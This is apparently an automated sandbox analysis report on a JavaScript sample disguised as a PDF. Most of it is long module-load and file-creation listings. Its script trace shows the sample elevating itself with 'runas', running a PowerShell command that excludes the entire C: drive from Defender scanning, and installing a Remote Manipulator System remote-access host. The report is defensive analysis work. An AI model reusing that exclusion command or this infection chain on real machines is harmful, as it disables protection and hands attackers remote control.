          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ngcsvc.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: authz.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: wtsapi32.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: winsta.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: tbs.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ngcctnrsvc.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: tbs.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ngcctnrgidshandler.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ktmw32.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ngcctnr.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: edputil.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: policymanager.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: appresolver.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: sppc.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: pcacli.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: mpr.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: sfc_os.dll
          Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
          Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
          Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
          Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
          Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
          Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
          Source: C:\Windows\System32\msiexec.exe | File written: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rppd.ini
          Source: C:\Windows\System32\wscript.exe | Automated click: OK
          Source: C:\Windows\System32\wscript.exe | Automated click: OK
          Source: C:\Windows\System32\wscript.exe | Automated click: OK
          Source: C:\Windows\System32\wscript.exe | Automated click: OK
          Source: C:\Windows\System32\wscript.exe | Automated click: OK
          Source: C:\Windows\System32\wscript.exe | Automated click: OK
          Source: C:\Windows\System32\wscript.exe | Automated click: OK
          Source: C:\Windows\System32\wscript.exe | Automated click: OK
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: U0443.pdf.js | Static file information: File size 2364898 > 1048576

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:270356 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:270354 o: f:ExpandEnvironmentStrings a0:%22%25APPDATA%25%22");IWshShell3.ExpandEnvironmentStrings("%APPDATA%");IWshShell3._00000000();ITextStream.WriteLine(" exit:270354 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%22");ITextStream.WriteLine(" entry:270413 f:IROSKEICDVTJLGCZLYGLCEVPP");ITextStream.WriteLine(" exec:270384 f:IROSKEICDVTJLGCZLYGLCEVPP");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Item();ITextStream.WriteLine(" entry:270387 o: f:Exists a0:%22elevated%22");IWSHNamedArguments.Exists("elevated");IWSHNamedArguments.Item();ITextStream.WriteLine(" exit:270387 o: f:Exists r:false");ITextStream.WriteLine(" exit:270413 f:IROSKEICDVTJLGCZLYGLCEVPP r:false");ITextStream.WriteLine(" entry:270445 f:LAPEJENFFIZIC");ITextStream.WriteLine(" exec:270586 f:LAPEJENFFIZIC");IHost.Name();ITextStream.WriteLine(" entry:270591 o:Windows%20Script%20Host f:CreateObject a0:%22Shell.Application%22");IHost.CreateObject("Shell.Application");IHost.Name();IShellDispatch6._00000000();ITextStream.WriteLine(" exit:270591 o:Windows%20Script%20Host f:CreateObject r:");IHost.ScriptFullName();IShellDispatch6._00000000();ITextStream.WriteLine(" entry:270604 o: f:ShellExecute a0:%22wscript.exe%22 a1:%22%22C%3A%5CUsers%5Cuser%5CDesktop%5CU0443.pdf.js%22%20%2Felevated%22 a2:%22%22 a3:%22runas%22 a4:1");IShellDispatch6.ShellExecute("wscript.exe", ""C:\Users\user\Desktop\U0443.pdf.js" ", "", "runas", "1");ITextStream.WriteLine(" entry:270291 o:%5Bobject%20Object%5D f:register a0:function%20(a)");ITextStream.WriteLine(" exec:166942 f:");ITextStream.WriteLine(" exit:270291 o:%5Bobject%20Object%5D f:register r:undefined");IHost.Name();ITextStream.WriteLine(" entry:270330 o:Windows%20Script%20Host f:Sleep a0:15000");IHost.Sleep("15000");IHost.Name();ITextStream.WriteLine(" exit:270330 o:Windows%20Script%20Host f:Sleep r:undefined");IHost.Name();ITextStream.WriteLine(" entry:270356 o:Windows%20Script%20Host f:CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:270356 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:270354 o: f:ExpandEnvironmentStrings a0:%22%25APPDATA%25%22");IWshShell3.ExpandEnvironmentStrings("%APPDATA%");IWshShell3._00000000();ITextStream.WriteLine(" exit:270354 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%22");ITextStream.WriteLine(" entry:270413 f:IROSKEICDVTJLGCZLYGLCEVPP");ITextStream.WriteLine(" exec:270384 f:IROSKEICDVTJLGCZLYGLCEVPP");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Item();ITextStream.WriteLine(" entry:270387 o: f:Exists a0:%22elevated%22");IWSHNamedArguments.Exists("elevated")
          Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:270356 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:270354 o: f:ExpandEnvironmentStrings a0:%22%25APPDATA%25%22");IWshShell3.ExpandEnvironmentStrings("%APPDATA%");IWshShell3._00000000();ITextStream.WriteLine(" exit:270354 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%22");ITextStream.WriteLine(" entry:270413 f:IROSKEICDVTJLGCZLYGLCEVPP");ITextStream.WriteLine(" exec:270384 f:IROSKEICDVTJLGCZLYGLCEVPP");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Item();ITextStream.WriteLine(" entry:270387 o: f:Exists a0:%22elevated%22");IWSHNamedArguments.Exists("elevated");IWSHNamedArguments.Item();ITextStream.WriteLine(" exit:270387 o: f:Exists r:true");ITextStream.WriteLine(" exit:270413 f:IROSKEICDVTJLGCZLYGLCEVPP r:true");ITextStream.WriteLine(" entry:270419 f:OHLHDFAUNYRYPBJOP");ITextStream.WriteLine(" exec:270624 f:OHLHDFAUNYRYPBJOP");IWshShell3._00000000();ITextStream.WriteLine(" entry:270638 o: f:Run a0:%22powershell.exe%20-Command%20%22Add-MpPreference%20-ExclusionPath%20'C%3A%5C'%22%22 a1:0 a2:true");IWshShell3.Run("powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"", "0", "true");ITextStream.WriteLine(" entry:263626 f:cd a0:%5Bobject%20Object%5D a1:%22goog.net%22");ITextStream.WriteLine(" exec:263584 f:");ITextStream.WriteLine(" entry:263617 o:%22goog.net%22 f:lastIndexOf a0:%22.%22");ITextStream.WriteLine(" exit:263617 o:%22goog.net%22 f:lastIndexOf r:4");ITextStream.WriteLine(" entry:263630 o:%22goog.net%22 f:substr a0:0 a1:4");ITextStream.WriteLine(" exit:263630 o:%22goog.net%22 f:substr r:%22goog%22");ITextStream.WriteLine(" entry:263626 f:cd a0:%5Bobject%20Object%5D a1:%22goog%22");ITextStream.WriteLine(" exec:263584 f:");ITextStream.WriteLine(" entry:263617 o:%22goog%22 f:lastIndexOf a0:%22.%22");ITextStream.WriteLine(" exit:263617 o:%22goog%22 f:lastIndexOf r:-1");ITextStream.WriteLine(" entry:263630 o:%22goog%22 f:substr a0:0 a1:-1");ITextStream.WriteLine(" exit:263630 o:%22goog%22 f:substr r:%22%22");ITextStream.WriteLine(" entry:263626 f:cd a0:%5Bobject%20Object%5D a1:%22%22");ITextStream.WriteLine(" exec:263584 f:");ITextStream.WriteLine(" exit:263626 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exec:263412 f:");ITextStream.WriteLine(" exit:263626 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exec:263412 f:");ITextStream.WriteLine(" exit:263626 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exec:263412 f:");ITextStream.WriteLine(" exit:263763 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exit:268445 o:%5Bobject%20Object%5D f:getLogger r:%5Bobject%20Object%5D");ITextStream.WriteLine(" entry:270291 o:%5Bobject%20Object%5D f:register a0:function%20(a)");ITextStream.WriteLine(" exec:166942 f:");ITextStream.WriteLine(" exit:270291 o:%5Bobject%20Object%5D f:register
          Source: eventmsg.dll.34.dr | Static PE information: section name: .didata
          Source: webmvorbisencoder.dll.34.dr | Static PE information: section name: _RDATA
          Source: vp8encoder.dll.34.dr | Static PE information: section name: .rodata
          Source: vp8decoder.dll.34.dr | Static PE information: section name: .rodata
          Source: webmvorbisdecoder.dll.34.dr | Static PE information: section name: _RDATA
          Source: libasset32.dll.34.dr | Static PE information: section name: /4
          Source: libasset32.dll.34.dr | Static PE information: section name: /14
          Source: libasset32.dll.34.dr | Static PE information: section name: /29
          Source: libasset32.dll.34.dr | Static PE information: section name: /41
          Source: libasset32.dll.34.dr | Static PE information: section name: /55
          Source: libasset32.dll.34.dr | Static PE information: section name: /67
          Source: libasset32.dll.34.dr | Static PE information: section name: /78
          Source: libasset32.dll.34.dr | Static PE information: section name: /94
          Source: libasset32.dll.34.dr | Static PE information: section name: /110
          Source: libcodec32.dll.34.dr | Static PE information: section name: .rodata
          Source: libcodec32.dll.34.dr | Static PE information: section name: /4
          Source: libcodec32.dll.34.dr | Static PE information: section name: /14
          Source: libcodec32.dll.34.dr | Static PE information: section name: /29
          Source: libcodec32.dll.34.dr | Static PE information: section name: /41
          Source: libcodec32.dll.34.dr | Static PE information: section name: /55
          Source: libcodec32.dll.34.dr | Static PE information: section name: /67
          Source: libcodec32.dll.34.dr | Static PE information: section name: /78
          Source: libcodec32.dll.34.dr | Static PE information: section name: /94
          Source: libcodec32.dll.34.dr | Static PE information: section name: /110
          Source: vccorlib120.dll.34.dr | Static PE information: section name: minATL
          Source: rutserv.exe.34.dr | Static PE information: section name: .didata
          Source: rfusclient.exe.34.dr | Static PE information: section name: .didata
          Source: vccorlib120.dll0.34.dr | Static PE information: section name: minATL
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6B377E30 push eax; mov dword ptr [esp], esi 39_2_6B377ED1
          Source: msvcr120.dll.34.dr | Static PE information: section name: .text entropy: 6.95576372950548
          Source: VPDAgent.exe.34.dr | Static PE information: section name: .text entropy: 6.812931691200469
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\VPDAgent.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\msvcr120.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rppd.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\emf2pdf.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrvui_rppd.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rppdpm.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unires_vpd.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\ARPPRODUCTICON.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\msvcr120.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rppdui.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\libasset32.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\setupdrv.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\vccorlib120.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rppd.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI44FB.tmp
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\vpd_sdk.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\vccorlib120.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\progressbar.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\setupdrv.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rppdpm.dll
